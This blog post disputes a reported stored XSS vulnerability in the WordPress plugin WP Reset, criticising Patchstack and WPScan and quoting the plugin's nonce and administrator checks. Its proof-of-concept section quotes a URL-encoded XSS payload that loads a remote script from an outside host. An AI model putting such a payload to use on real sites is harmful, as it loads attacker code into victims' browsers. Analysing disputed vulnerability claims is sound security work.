Patchstack and Their Red Team Don’t Understand Basics of WordPress Security

One long time issue when it comes to collecting data on vulnerabilities in WordPress plugins is that many reported vulnerabilities are not really vulnerabilities. What has recently been an increasing problem though is that these false reports are coming directly from other data providers. One of those providers is Patchstack, which has something called the Patchstack Red Team. That apparently is a bug bounty program, not really a red team (or a team at all), but whatever it is, Patchstack posted a listing to their vulnerability database the other day for the plugin WP Reset that is credited to “m0ze (Patchstack Red Team)”. Looking at the details of that didn’t look promising as to that being a real vulnerability and a quick check of the code confirmed that it wasn’t.

Authenticated Stored Cross-Site Scripting (XSS) in WP Reset

The only details provided about the claimed authenticated stored cross-site scripting (XSS) vulnerability are these two proofs of concepts:

[!] https://example.com/wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&tool=create_snapshot&extra_data=%3Cimg%20src%3Dx%20onerror%3D%3Bimport(%60%2F%2Fm0ze.ru%2Fpayload%2Fa.js%60)%3B%20%2F%2F%3E

[!] GET /wp-admin/admin-ajax.php?action=wp_reset_run_tool&_ajax_nonce=394f497fd0&tool=create_snapshot&extra_data=%3Cimg%20src%3Dx%20onerror%3D%3Bimport(%60%2F%2Fm0ze.ru%2Fpayload%2Fa.js%60)%3B%20%2F%2F%3E HTTP/2
Host: example.com

There is a nonce included in that, which is a big red flag, since that is supposed to be a unique value, so it doesn’t make much sense that what looks like a valid value for that in a proof of concept. Either a valid nonce isn’t needed, and it was included despite that, or a valid nonce is needed and the reporter didn’t even understand the significance of that.

Another chunk of the URL shows that this involves calling the plugin’s function accessible with the AJAX action “wp_reset_run_tool”. Looking at the code that function is ajax_run_tool:

106	add_action('wp_ajax_wp_reset_run_tool', array($this, 'ajax_run_tool'));

The first thing that function does in the supposedly vulnerable version is check for a valid nonce, so the proof of concept won’t work, since it wouldn’t be valid other than in the one instance this person was working in:

  function ajax_run_tool()
  {
    check_ajax_referer('wp-reset_run_tool');
 
    if (!current_user_can('administrator')) {
      wp_send_json_error(__('You are not allowed to run this action.', 'wp-reset'));
    }

Right after that, it restricts as to the functionality to an Administrator. It wouldn’t be a vulnerability for someone logged in as Administrator to do the equivalent of cross-site scripting (XSS), since they have the unfiltered_html capability. Also, they are an Administrator, so they can do whatever they want. So both the people running Patchstack’s Vulnerability Database and their Red Team, don’t appear to have a basic understanding of WordPress security.

Another way to check this would be to try the proof of concept, which not surprisingly based on the code already show, returns “-1” when making the request as an Administrators.

WPScan Too

Patchstack is not the only bad actor here, as another data WPScan is also spreading this false claim, even claiming they verified it, despite this obviously not being a vulnerability and the proof of concept not working: